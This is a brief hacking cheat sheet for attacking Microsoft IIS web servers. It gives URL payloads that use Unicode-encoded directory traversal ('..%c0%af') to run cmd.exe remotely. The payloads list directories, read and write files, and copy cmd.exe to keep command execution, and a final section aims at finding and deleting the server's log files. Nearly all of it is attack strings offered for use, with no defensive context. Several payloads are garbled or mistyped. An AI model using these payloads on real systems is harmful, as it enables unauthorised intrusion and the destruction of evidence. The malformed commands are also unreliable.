Microsoft IIS Web Server cracking

 

 

Temporary folder: /system32/cmd?/c+dir+c\TEMP

 

Download a file:

 

/contents/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/winnt/system32.cmd.exe?/c%20type\c%20c:\*contents.file

 

Create a text file:

 

/contents/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/..%c0%af/winnt/system32.cmd.exe?/c%20echo%20Your Text  Goes Here!!!!!>\%test.txt

 

How to gain accces to the web server:

 

cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\cmd1.exe

 

/winnt/system32/cmd1.exe?/c+dir+c:\

 

Cmd1.exe?/c+echo+helow!+>+c:\test.txt

Cmd1.exe?c+echo+hellow!+>d:\text.txt

 

Deleting the log files:

 

Cmd1.exe?/c+dir+/S+c:\*W3SVC32